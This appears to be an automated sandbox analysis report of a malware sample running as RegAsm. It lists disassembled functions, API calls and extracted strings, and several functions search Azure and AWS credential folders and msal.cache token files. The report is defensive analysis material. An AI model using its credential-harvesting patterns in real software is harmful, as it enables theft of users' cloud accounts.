Instruction Fuzzy Hash: 94515B76A0431167E2149A70AC82F9B76AC7F41F58F4C4178FD88A72C2F766E50D82E3

Uniqueness

Uniqueness Score: -1.00%

Function 19BF7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname5, xrefs: 19BF8233
etilqs_, xrefs: 19BF824C
winGetTempname1, xrefs: 19BF817B
winGetTempname2, xrefs: 19BF8094
winGetTempname4, xrefs: 19BF8355

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: d599dfa067c35e16905e60867d80b098277ca4680b917dcbd1b51898f8a73bd2
Instruction ID: 7ebe6dd5098a4cd3e4fc1e8fd3a2cd9f78f77f7ea863970be9b562b0a45b959e
Opcode Fuzzy Hash: d599dfa067c35e16905e60867d80b098277ca4680b917dcbd1b51898f8a73bd2
Instruction Fuzzy Hash: ABA18C755003755BD7004B78AC41BAA7B5ADF41611F8C41A5EDCA9B1C2E62BA10FC3B3

Uniqueness

Uniqueness Score: -1.00%

Function 19A82BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

ORDER BY name, xrefs: 19A82DCC
misuse, xrefs: 19A82E73
invalid, xrefs: 19A82E4E
WHERE name=%Q, xrefs: 19A82DB7
unopened, xrefs: 19A82E55
%s at line %d of [%.10s], xrefs: 19A82E78
SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 19A82DA4
NULL, xrefs: 19A82E38
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19A82E69
API call with %s database connection pointer, xrefs: 19A82E5A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: b69c2fa37755bdd32d4b1b2900965d4f0efc0a6d771b84703db5f695e9a99d12
Instruction ID: 2f3257461483309657e7e610fd4fd1e14e52cc4f233dc319d25990d25590bcf9
Opcode Fuzzy Hash: b69c2fa37755bdd32d4b1b2900965d4f0efc0a6d771b84703db5f695e9a99d12
Instruction Fuzzy Hash: BCC159709043549BD7108F24CC45B777BE9AF40BCAF4C8469EC999B282E335E95EC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004022D0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 63stringmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,0000000F,00418875), ref: 004022E2
strlen.MSVCRT ref: 00402307
strlen.MSVCRT ref: 00402311
strlen.MSVCRT ref: 0040231B
strlen.MSVCRT ref: 00402323
strlen.MSVCRT ref: 00402340
strlen.MSVCRT ref: 0040234A
strlen.MSVCRT ref: 00402360
strlen.MSVCRT ref: 0040236A
strlen.MSVCRT ref: 00402374
strlen.MSVCRT ref: 0040237E

Strings

At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402379
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402365
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040236F
The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs)., xrefs: 00402302
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 00402333
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040230C
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040235B
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402345
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402316

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$AllocLocal
String ID: At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
API String ID: 710835760-1224611842
Opcode ID: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
Instruction ID: f498ca94b0cf780e3660f044cf5a8bded02fdd4dda412cde648ac572d59e650e
Opcode Fuzzy Hash: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
Instruction Fuzzy Hash: DD11E639748220AB8710BEAF9CD3AC9B755AF84704B984067FD18A3282C57D5C4042B9

Uniqueness

Uniqueness Score: -1.00%

Function 00417CE0 Relevance: 28.6, APIs: 10, Strings: 9, Instructions: 145stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417D11

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 00417D37
lstrcat.KERNEL32(?,\.azure\), ref: 00417D54

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

memset.MSVCRT ref: 00417D93
lstrcat.KERNEL32(?,00000000), ref: 00417DBF
lstrcat.KERNEL32(?,\.aws\), ref: 00417DDC

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,012BF680), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

memset.MSVCRT ref: 00417E1B
lstrcat.KERNEL32(?,00000000), ref: 00417E47
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417E64

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

memset.MSVCRT ref: 00417EA3

Strings

\.azure\, xrefs: 00417D48
*.*, xrefs: 00417D5F
\.aws\, xrefs: 00417DD0
Azure\.IdentityService, xrefs: 00417E6A
Azure\.aws, xrefs: 00417DE2
msal.cache, xrefs: 00417E6F
Azure\.azure, xrefs: 00417D5A
*.*, xrefs: 00417DE7
\.IdentityService\, xrefs: 00417E58

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 515946987-974132213
Opcode ID: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
Instruction ID: 1b53bb84b6d4d4d6c781053bd63c720a49e678cd70851be9322f010e7c87751d
Opcode Fuzzy Hash: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
Instruction Fuzzy Hash: 3051F571900219ABCB14EBA0CC46FED7778AB1C704F64466EBA54631C2EF7C5B48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 19B85D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

automerge, xrefs: 19B85E59
usermerge, xrefs: 19B85EAD
pgsz, xrefs: 19B85D81
hashsize, xrefs: 19B85DF0
deletemerge, xrefs: 19B85F64
secure-delete, xrefs: 19B86031
crisismerge, xrefs: 19B85EF7
rank, xrefs: 19B85FBB

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: a6ea368d7cd4a2d0d0c5af2436b9485ffbe180eee6a2545c11b9ebb83c3d1961
Instruction ID: 22fda2580e88e2d5aa8c27193ce323e91969bca23a975e16ae7daaad25989f57
Opcode Fuzzy Hash: a6ea368d7cd4a2d0d0c5af2436b9485ffbe180eee6a2545c11b9ebb83c3d1961
Instruction Fuzzy Hash: 02715DB6B012529BC6059A19EC4165F77D5EF89213F0C04BDFD42C7391EB21E94A87A2

Uniqueness

Uniqueness Score: -1.00%

Function 19A75E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

misuse, xrefs: 19A75F35, 19A7625D, 19A7638F
API called with finalized prepared statement, xrefs: 19A75F1F, 19A76247, 19A76379
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 19A75E6F
%s at line %d of [%.10s], xrefs: 19A75F3A, 19A76262, 19A76394
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19A75F2B, 19A76253, 19A76385
recursive definition for %s.%s, xrefs: 19A75E4C
no such fts5 table: %s.%s, xrefs: 19A762EA

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: a10bd9dddf4ac1ab7499864ec76a9001a6ee0573933d30a0226231b49534e319
Instruction ID: 2b7d3eeb1067ef1c26f255d63bea16fc764471831e6ff736ac049007fb8225e1
Opcode Fuzzy Hash: a10bd9dddf4ac1ab7499864ec76a9001a6ee0573933d30a0226231b49534e319
Instruction Fuzzy Hash: 2602F3B49007559BD704CF24DC86B9B77E8BF44B18F0C4568E98997282E772E90DCBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00412870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
ExitProcess.KERNEL32 ref: 004128B3
strtok_s.MSVCRT ref: 004128CA

Strings

block, xrefs: 00412893

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
Instruction ID: ae6e9dac41f5a43a3b2df2dea02a57a44f9796bfde1c63c592e4e2a6fe63bb36
Opcode Fuzzy Hash: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
Instruction Fuzzy Hash: F141E6B1B50342ABDB509F799D04ADB7BA9BF05B04F60062FF502D3684EABC94909B58

Uniqueness

Uniqueness Score: -1.00%

Function 19AE9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

misuse, xrefs: 19AE9A3F, 19AE9D9A
API called with finalized prepared statement, xrefs: 19AE9A19, 19AE9D84
%s at line %d of [%.10s], xrefs: 19AE9A44, 19AE9D9F
API called with NULL prepared statement, xrefs: 19AE9A04
SELECT %s, xrefs: 19AE99B1
no such function: %s, xrefs: 19AE9E8C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AE9A35, 19AE9D90

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: c666cbd8d0a5d02923222b50e5b1adfa299972a5be5aea5d150780d329e20e82
Instruction ID: 8a7ac4198b578970a24633189740912695b7955d2b9f0fab587db40c4fbc3f23
Opcode Fuzzy Hash: c666cbd8d0a5d02923222b50e5b1adfa299972a5be5aea5d150780d329e20e82
Instruction Fuzzy Hash: 74E1F2B49047419BD710DF24CC85B5B77E9AFC4B18F0C452CE9899B281E775E84DC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00413A80 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 210stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413AB3
memset.MSVCRT ref: 00413AC5

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 00413AF1
lstrcat.KERNEL32(?,012C3260), ref: 00413B10
lstrcat.KERNEL32(?,?), ref: 00413B24
lstrcat.KERNEL32(?,012C3110), ref: 00413B38

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,012C3008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 004119B0: GlobalAlloc.KERNEL32(00000000,00413BC9,00000000,?,?,00413BC9,?,?), ref: 004119BB

StrStrA.SHLWAPI(00000000,012C3410), ref: 00413BD5
GlobalFree.KERNEL32(00000000), ref: 00413CAA

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170

lstrcat.KERNEL32(?,00000000), ref: 00413C4E
StrCmpCA.SHLWAPI(?,00428367,?,?,?,?,000003E8), ref: 00413C6B
lstrcat.KERNEL32(?,?), ref: 00413C86
lstrcat.KERNEL32(?,004286E0), ref: 00413C92

Strings

tA, xrefs: 00413D14, 00413B66, 00413B6E
tA, xrefs: 00413CE4, 00413BF9, 00413C78, 00413BFD, 00413C7B, 00413CE7

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID: tA$tA
API String ID: 4228189460-660347137
Opcode ID: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
Instruction ID: dee6d321855fcd0dcb4b30ed1074f5a9a8d64092eff38df03ecb134e2f941785
Opcode Fuzzy Hash: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
Instruction Fuzzy Hash: 5C71BBB5D00209ABCB10EFA1CC85EEE7779AF58304F10455EF615B3181EB789B48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19AA3800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

null, xrefs: 19AA38E7
misuse, xrefs: 19AA393A
real, xrefs: 19AA3895, 19AA38EC
API called with finalized prepared statement, xrefs: 19AA3924
%s at line %d of [%.10s], xrefs: 19AA393F
cannot open value of type %s, xrefs: 19AA38ED
no such rowid: %lld, xrefs: 19AA39F8
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AA3930
integer, xrefs: 19AA389A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
